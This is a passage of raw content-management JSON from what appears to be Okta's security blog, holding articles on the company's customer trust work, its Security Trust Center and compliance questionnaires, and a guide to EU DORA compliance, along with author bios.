security at the heart of everything, from product development to customer support. By sticking to strict security standards, Okta customers are reassured that their identities and data are safe. 
\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://sec.okta.com/articles\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta Security\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" articles help build trust and transparency with regular updates on security measures, product features, and potential vulnerabilities in alignment with our vision to\",\"marks\":[],\"data\":{}},{\"nodeType\":\"text\",\"value\":\" free everyone to safely use any technology.\",\"marks\":[{\"type\":\"italic\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\" \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-3\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Communication and Transparency\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Clear communication is pivotal to building trust. Okta has simplified accessing security information by uploading third-party attestations, industry-standard questionnaires, and current policies to our \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"http://security.okta.com\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Trust Center\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\", reducing the need for formal security reviews and lengthy questionnaires.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The effectiveness of any Trust Center hinges on the quality of its content. 
In Okta’s, you’ll find: \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"unordered-list\",\"data\":{},\"content\":[{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Policies covering all aspects of security\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Information addressing common questions and standard questionnaires\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Roadmaps outlining upcoming security improvements\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Certifications, privacy policies, and whitepapers\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Centralizing these documents creates a secure hub for security information, ensuring only authorized individuals have access. 
\",\"marks\":[],\"data\":{}},{\"nodeType\":\"text\",\"value\":\"For more information on accessing Okta's Security Trust Center, visit our \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://support.okta.com/help/s/article/accessing-okta-s-security-trust-center?language=en_US\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta Docs\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\".\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-3\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Customer-Centricity and Continuous Improvement\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"At Okta, customer-centricity and continuous improvement are priorities. Okta’s solutions are tailored to meet the evolving needs and preferences of our customers. We demonstrate our commitment to both trust and customer satisfaction by listening to customer feedback and addressing concerns. \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"We also understand that trust is earned through consistent performance and continuous enhancement, Okta invests in research and innovation to stay ahead of emerging threats. Continuous improvement is key, and every employee plays a part in maintaining customer trust by fostering a culture of security awareness.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-2\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The Future of Customer Trust\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Advances in technology and cyber threats will continue to grow in sophistication, and as such organizations must remain dedicated to building trust, viewing new challenges as opportunities for growth and innovation. 
I’m confident that Okta will continue to set high standards in both trust-building and identity management, while staying committed to strong core values including integrity, security, and customer-centricity.\",\"marks\":[],\"data\":{}}]}]}"},"summary":{"summary":"Trust plays a pivotal role in getting new prospects interested and retaining current customers. Earning and maintaining customer trust isn't just a goal; it's a commitment guiding every decision."},"updatedAt":"2025-06-19T21:01:41.796Z","secAuthor":[{"id":"0549c9bd-5615-52a0-8683-f6b734b931cc","bio":{"bio":"<p> Tushar Badlani is the Global Customer Audit Manager within the Security Trust and Culture team at Okta. He leads Okta’s global customer audit program, ensuring consistent, risk-aligned assurance engagements across all regions. He brings extensive experience in customer assurance, compliance, and cross-functional collaboration, shaped by his consulting background at EY and work across industries and in professional services. Originally from India, he earned his master’s degree from Syracuse University and is now based in San Francisco. 
Outside of work, he enjoys hiking, backpacking, and travelling to explore new places and cultures; he’s now been to 27 countries and 45 US States.</p>"},"image":{"url":"https://images.ctfassets.net/kbkgmx9upatd/61duT68OiTwHjxJS8gPPuy/f02be27b559de0ada96a7902d219f067/Tushar_HeadShot.jpg"},"name":"Tushar Badlani","jobTitle":"Global Customer Audit Manager","slug":"/hacker/tushar-badlani","node_locale":"en"}]},{"slug":"/articles/2025/03/empowering-security-with-customer-trust-solutions","id":"6f25073a-2444-5626-86db-a35b1ed5ff96","title":"Empowering Security with Customer Trust Solutions","date":"2025-03-12T00:00","sys":{"contentType":{"sys":{"id":"secBlogpost","linkType":"ContentType","type":"Link"}},"type":"Entry"},"body":{"raw":"{\"nodeType\":\"document\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"This is the second blog publication in our series on Security Customer Trust. In our first blog, \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://sec.okta.com/articles/2024/09/unveiling-essence-security-customer-trust\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Unveiling the Essence of the Security Customer Trust Function,\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" we explored how Okta’s Security Customer Trust team proactively maintains transparency and introduced our mission: \",\"marks\":[],\"data\":{}},{\"nodeType\":\"text\",\"value\":\"to bolster security outcomes for Okta and the communities we serve\",\"marks\":[{\"type\":\"italic\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\".\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"At Okta, trust is fundamental to how we provide support. 
In alignment with \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://www.okta.com/secure-identity-commitment/?_gl=1*1onpm9o*_gcl_aw*R0NMLjE3Mzc1ODA2MTAuQ2owS0NRaUF5OEs4QmhDWkFSSXNBS0o4c2ZUY0draGtGdkpOTWFpcFVrVFhCOG1jOUw5NGNjMHpKZXdOZjRXOUNUZzBxN1FFOUx5bnF3TWFBamtIRUFMd193Y0I.*_gcl_au*MTA4NzgyODQ1Ny4xNzM2ODIyNzEz*_ga*MTkzMzAxMTAxOS4xNzM2NzkzNzAy*_ga_QKMSDV5369*MTczOTMwNDc5Ny4xNS4xLjE3MzkzMDUyMDcuMy4wLjA.\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta’s Secure Identity Commitment\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" (OSIC), we continuously invest in making security information more accessible and transparent for our customers. A key component of upholding trust is equipping both our internal teams and our customers with the necessary tools and resources to succeed.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Given today’s numerous regulators, rigorous compliance certifications and internal policy adherence, we recognize that accessing key compliance documentation and obtaining timely responses to security inquiries is challenging and time-consuming. In this blog, we’ll touch on how we’ve introduced efficiencies in supporting these challenges through enablement, automation and self-service accesses. We continue to enable empowerment to enhance customer trust, drive efficiency, and reinforce customer confidence in the security of Okta’s products.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-2\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Common compliance challenges\\t\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"While security certifications and frameworks establish a solid foundation, ensuring seamless access to security information for customers and prospects is a common cybersecurity challenge. 
\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The absence of a Trust Center adds several complexities for requestors seeking to obtain the required documentation. From a lack of a centralized source of truth to the back-and-forth with common security questions, customers will recognize inefficiencies when working with auditors and regulators for their compliance-related activities. In addition, messaging inconsistencies are likely a result of manual efforts and the lack of RSS functionality. Timeliness is a significant challenge without a security customer trust solution - customers and prospects will often find themselves experiencing response delays.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-2\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Essential solutions for Security Customer Trust\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"When strategizing, we prioritized scalability, seamless integration capabilities, and ease of use for both our solutions and technology. Enablement and automation solutions are fundamental to strengthening security and customer trust. By empowering our teams with ongoing training, a centralized knowledge base, and technology automation, we ensure they have the resources and confidence needed to navigate customer support requests effectively.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-3\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Enablement\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"A core component of our security toolkit is a comprehensive, centralized knowledge base. 
This internal knowledge base serves as the source of truth for security policies, compliance certifications, and security-related Q&A, which helps streamline questionnaire responses to customer or prospect inquiries.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"A knowledge base ensures field teams have quick access to up-to-date information. It also provides a repository of common questions and answers to efficiently resolve repeat inquiries. By enabling self-service resources, we equip internal teams to succeed independently, reducing reliance on our security professionals for less complex inquiries.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-3\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Automation\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Playing a crucial role in improving operational efficiency regarding security and customer trust is automation. By automating key repeat processes, we minimize manual effort and accelerate response times to our customers. 
Automation introduced streamlined workflows, ensuring consistency in addressing common security challenges faced in the industry, like:\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"unordered-list\",\"data\":{},\"content\":[{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Providing timely responses to security questionnaires and compliance assessments,\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Issuing important customer-centric messaging and communications,\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Keeping field teams informed with the latest security updates.\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"At Okta, we utilize no-code workflow tools for automation use cases, which include ticket creation, streamlined audit processes, and standardizing engagement between field and security teams.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"These automated workflows allow us to respond quickly and accurately, ensuring critical tasks are executed in real-time. For use cases such as penetration test and vulnerability information requests, we’ve implemented automated workflows for submission, tracking, and reporting. This ensures that security assessments are conducted efficiently and comprehensively, with timely customer responses. 
We’re committed to continually refining our policies and processes to enhance security assurance and privacy controls.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-2\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Security Trust Center benefits\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Last year, Okta introduced efficiencies by launching a new \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://security.okta.com\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Security Trust Center\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\", offering our customers and prospects real-time, on-demand access to Okta’s security and compliance documentation. Okta provides access to widely recognized industry-standard questionnaires via the \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://security.okta.com\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Security Trust Center\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\", such as the following and more:\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"unordered-list\",\"data\":{},\"content\":[{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"CAIQ (Consensus Assessments Initiative Questionnaire),\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"SIG (Standardized Information Gathering Questionnaire),\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"SIG Privacy (Standardized Information Gathering – Privacy 
Questionnaire),\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"HECVAT (Higher Education Community Vendor Assessment Toolkit). \",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The on-demand availability of industry-standard questionnaires helps streamline security assessments and effectively communicate an organization’s security controls, ensuring transparency and facilitating compliance discussions. In turn, organizations can streamline questionnaire responses, ensuring accurate and efficient turnaround times. \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"We invite you to explore our frictionless, transparent \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://security.okta.com\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Security Trust Center\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" to learn more about our transparency and security practices. 
\",\"marks\":[],\"data\":{}},{\"nodeType\":\"text\",\"value\":\"For more information on accessing Okta's Security Trust Center, visit our \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://support.okta.com/help/s/article/accessing-okta-s-security-trust-center?language=en_US\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta Docs\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\".\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-2\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Stay updated\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The essential solutions and technologies detailed in this blog article enable Okta to provide efficient, around-the-clock support to internal teams and external customers and prospects, focusing on security and customer trust.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta leverages the contact information of the \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://support.okta.com/help/s/article/okta-contact-definitions?language=en_US#:~:text=Definition%3A%20A%20Primary%20Security%20Contact,security%20and%2For%20privacy%20incident\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta Contact\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" for targeted messaging and automated approval for access to the efficient \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"http://security.okta.com\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Security Trust Center\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\". 
To ensure we have the most current security contacts for your organization, enabling you to stay informed on the latest critical security updates, we encourage our customers to reach out to their account teams to validate that the appropriate \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://support.okta.com/help/s/article/super-admins-leverage-the-okta-help-center-to-review-and-update-your-companys-primary-security-contact-and-cio-ciso-contact?language=en_US\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta Contacts\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" are on file. As we continue to enhance our offerings with security and customer trust at the forefront, stay tuned for more.\",\"marks\":[],\"data\":{}}]}]}"},"summary":{"summary":"This is the second blog publication in our series on Security Customer Trust. In our first blog, we explored how Okta’s Security Customer Trust team proactively maintains transparency and introduced our mission: to bolster security outcomes for Okta and the communities we serve. In this blog, we’ll touch on how we’ve introduced efficiencies in supporting these challenges through enablement, automation and self-service accesses."},"updatedAt":"2025-06-19T21:00:10.320Z","secAuthor":[{"id":"0549c9bd-5615-52a0-8683-f6b734b931cc","bio":{"bio":"<p> Tushar Badlani is the Global Customer Audit Manager within the Security Trust and Culture team at Okta. He leads Okta’s global customer audit program, ensuring consistent, risk-aligned assurance engagements across all regions. He brings extensive experience in customer assurance, compliance, and cross-functional collaboration, shaped by his consulting background at EY and work across industries and in professional services. Originally from India, he earned his master’s degree from Syracuse University and is now based in San Francisco. 
Outside of work, he enjoys hiking, backpacking, and travelling to explore new places and cultures; he’s now been to 27 countries and 45 US States.</p>"},"image":{"url":"https://images.ctfassets.net/kbkgmx9upatd/61duT68OiTwHjxJS8gPPuy/f02be27b559de0ada96a7902d219f067/Tushar_HeadShot.jpg"},"name":"Tushar Badlani","jobTitle":"Global Customer Audit Manager","slug":"/hacker/tushar-badlani","node_locale":"en"},{"id":"fa04ab47-82af-5c37-83c0-2a2a861a79f8","bio":{"bio":"<p>Lydia Le is an Associate Analyst at Okta, providing Assurance support to the Security Customer Trust team. Her commitment to continuous learning and keen attention to detail supports Okta’s mission by securing digital Identities and strengthening customer trust. Outside of work, Lydia enjoys reading, traveling, and exploring new cuisines - always eager to broaden her horizons and learn differing perspectives. </p>"},"image":{"url":"https://images.ctfassets.net/kbkgmx9upatd/4UqwT1r4PKuCRxpLI1bACF/6f9650ead38a1cc0785134df4f3c0ab5/profile.jpg"},"name":"Lydia Le","jobTitle":"Associate Analyst","slug":"/hackers/lydia-le","node_locale":"en"}]},{"slug":"/articles/2025/05/a-guide-to-dora-compliance-with-okta","id":"000752a2-da24-5457-9d42-94ca21d9a9e4","title":"A Guide to DORA Compliance with Okta","date":"2025-05-07T00:00","sys":{"contentType":{"sys":{"id":"secBlogpost","linkType":"ContentType","type":"Link"}},"type":"Entry"},"body":{"raw":"{\"nodeType\":\"document\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"This blog article provides a brief overview of the DORA regulation, outlines how Okta can support compliance adherence, and introduces our new Factsheet, a helpful resource for satisfying DORA's regulated requirements.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-2\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"What is 
DORA?\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://www.eiopa.europa.eu/digital-operational-resilience-act-dora_en\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Digital Operational Resilience Act\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" (Regulation (EU) 2022/2554), most commonly known as DORA, became applicable in January 2025 and addresses a critical gap in EU financial regulation.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"With the introduction of DORA, financial institutions must follow stringent guidelines for safeguarding against ICT-related incidents. These include measures for protection, detection, containment, recovery, and repair. DORA explicitly targets ICT risks, introducing clear rules for ICT risk management, incident reporting, operational resilience testing, and oversight of ICT third-party risks.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-2\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"How does Okta support regulated customers?\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta is committed to supporting our regulated customers in adhering to DORA regulatory compliance. 
To guide our customers in adhering to DORA requirements with Okta, we’ve recently released a helpful resource: the new \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://security.okta.com/?itemUid=72d0d5d6-8cc8-4333-91d4-743159aba9f4&source=click\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"DORA Compliance with Okta\",\"marks\":[{\"type\":\"underline\"},{\"type\":\"bold\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\" \",\"marks\":[{\"type\":\"underline\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\"Factsheet\",\"marks\":[{\"type\":\"underline\"},{\"type\":\"bold\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\".\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"This factsheet provides valuable information that regulated customers can reference in their compliance efforts, including:\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"unordered-list\",\"data\":{},\"content\":[{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"heading-3\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"An Introduction to the Key DORA Domains\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"This section provides an overview of the five key DORA domains and a high-level view of how Okta’s controls, processes, and supporting documentation can help regulated customers achieve domain requirements. 
Customers can reference this to review Okta’s compliance information in alignment with the DORA requirements.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"unordered-list\",\"data\":{},\"content\":[{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"heading-3\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"How can Okta help?\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"This section highlights some of the many Okta features that are critical components of a highly available, resilient and secure identity platform. Customers can reference the information and links within this section to perform a thorough assessment of Okta’s security posture as it applies to their own DORA regulatory requirements. \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"unordered-list\",\"data\":{},\"content\":[{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"heading-3\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Detailed DORA Article mapping \",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Lastly, this section proactively maps the DORA domains and applicable DORA Articles with corresponding Okta Control Library Supporting Information for easy reference. 
Okta’s Control Library supports customers with a comprehensive collection of security controls adopted by our organization to protect systems and data.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-2\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"More on Compliance\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"As highlighted in our DORA Compliance with Okta Factsheet, Okta upholds a strong compliance framework to demonstrate our commitment to maintaining highly available, secure and resilient products and services - many of the DORA requirements are business as usual.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"A key component of our methodical customer support is making the information they require readily available. We publish our latest independent audit reports and other related documents on the \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://security.okta.com/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Security Trust Center\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\". 
\",\"marks\":[],\"data\":{}},{\"nodeType\":\"text\",\"value\":\"For more information on accessing Okta's Security Trust Center, visit our \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://support.okta.com/help/s/article/accessing-okta-s-security-trust-center?language=en_US\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta Docs\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\".\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://security.okta.com/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Security Trust Center\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" and all available documentation is accessible to customers and prospects of Okta. Site visitors can view Okta’s certifications and access industry-standard questionnaires. To learn more about our efforts, read our blog article, \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://sec.okta.com/articles/2025/03/empowering-security-with-customer-trust-solutions/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Empowering Security with Customer Trust Solutions\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\".  Keep watching as we publish additional helpful resources; more to come.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\\n\",\"marks\":[],\"data\":{}},{\"nodeType\":\"text\",\"value\":\"Disclaimer: \",\"marks\":[{\"type\":\"italic\"},{\"type\":\"bold\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\"While this article discusses certain legal concepts, it does not constitute legal advice. It is provided for informational purposes only. 
For legal advice regarding your organization's compliance needs, please consult your organization's legal department. Okta makes no representations, warranties, or other assurances regarding the content of this article. Information regarding Okta's contractual assurances to its customers can be found at \",\"marks\":[{\"type\":\"italic\"}],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"http://okta.com/agreements\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"okta.com/agreements\",\"marks\":[{\"type\":\"italic\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\".\",\"marks\":[],\"data\":{}}]}]}"},"summary":{"summary":"This blog article provides a brief overview of the DORA regulation, outlines how Okta can support compliance adherence, and introduces our new Factsheet, a helpful resource for satisfying DORA's regulated requirements."},"updatedAt":"2025-06-19T20:58:42.206Z","secAuthor":[{"id":"9b70b212-4a99-533c-89ce-b03712fa8a5e","bio":{"bio":"<p>Aimi Mcilwraith is a Senior Security Analyst at Okta. The Customer Assurance team within Security Trust & Culture supports Okta’s growing customer base with inquiries pertaining to security and compliance. Backed by over a decade of Security experience working in public and private sector organizations, Aimi has honed a deep understanding of security practices and risk management. CCSK and NIST CSF-certified, she leverages her knowledge and commitment to excellence in safeguarding digital environments to support customers globally from the EMEA region. In her downtime, Aimi enjoys reading and attending concerts.  
